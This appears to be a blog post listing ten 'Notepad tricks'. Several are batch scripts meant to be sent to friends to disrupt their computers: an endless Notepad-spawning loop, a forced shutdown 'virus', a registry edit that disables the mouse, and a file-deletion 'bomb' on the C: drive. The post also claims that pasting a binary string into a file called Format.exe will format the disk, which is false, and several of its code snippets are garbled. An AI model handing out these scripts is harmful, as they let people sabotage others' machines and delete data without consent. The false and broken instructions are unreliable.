Top 10 Interesting Notepad Tricks

Notepad is a simple text editor for Microsoft Windows and a basic text-editing program which enables computer users to create documents. Using notepad we can create different types of extensions. In this post, I am going to show some of the interesting Notepad Tricks.

1. Create a fake Windows Error message:

Open Notepad, Type the below-mentioned code in notepad, and save it as Error.bat. Then run the Batch file. This will pop up the fake windows error message.

X=Msgbox(“Press OK and Windows will restart now.”,0+16, “There is a serious problem in your system”)

2. Open 100s of Notepad Tab to Crash a Computer.

Open the notepad and copy the code and save it as Unlimited.bat. then send it to your friends.

@ECHO off :top START %SystemRoot%\system32\notepad.exe 

Save it as “Unlimited.bat” and send it to your friends.

 3. Create a Notepad Virus that Shutdown your Friend’s Computer with a Message

Open Notepad and Type the code and save it as shutdownvirus.bat then send it to your friend.

@echo off Shutdown.exe -s -t 10 cls msg * I don’t like you MATE! 

Save it as “shutdownvirus.bat”.

4. Disable the Mouse Controls in Computer

Type the code below in the notepad then save it as DisableMouse.bat then run it. This will disable the Mouse.

rem Disable Mouse set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4

5. Make A Personal Log-Book or A Diary

Open Notepad and type: .LOG (in capital letters) Save it as “personaldiary.txt”. When you open the file again you will see the current date and time inserted automatically after the LOG line. This will happen automatically every time you reopen the notepad file.

6. Create Matrix Movie Computer Screen Effects in Your Computer

Matrix seance-Notepad Tricks

This is my favorite Notepad Tricks Open Notepad and Type:

@echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start 

Save the file name as ”matrix .bat ” on your Computer. Launch the matrix.bat file now you can see the Matrix flow on your screen.

7. Format your Whole Hard Disk by Type Code in Notepad

This is very interesting code, the following code will wipe out your entire hard disk, so make sure you not running on your own working computer.

Open notepad and copy-paste the following code in the text editor.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Save it as “Format.exe” file giving any name you desire. That’s It! Now just double-click on the file (to open it) and your C: drive will be formatted! This is just a little binary trick. Be Careful while using it.

8. Test Your Anti-Virus Program Effectiveness

Test your antivirus works or not from type the below code in notepad. Copy the code given below in your notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 

Save it as “virus.exe” on your computer. While opening the exe file your antivirus will prompt and say this is a working virus. So you can conclude that antivirus is working properly on your Window PC Computer.

9. Write Simple Undetectable Virus

@Echo off Del C:\ *.* |y 

And save that as bomb.bat on your Computer. Warning: Don’t RUN this on your own computer

10. Constantly Repeat Notepad Messages

@ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Let's have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN 

Save the file as “continue.bat” on your computer. When you open this file on your computer, you can see the message line by line, without typing anything. For More Cool, Notepad Tricks Click Here.

Read Also:

How to Change Default Encoding in Notepad?

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Scroll to Top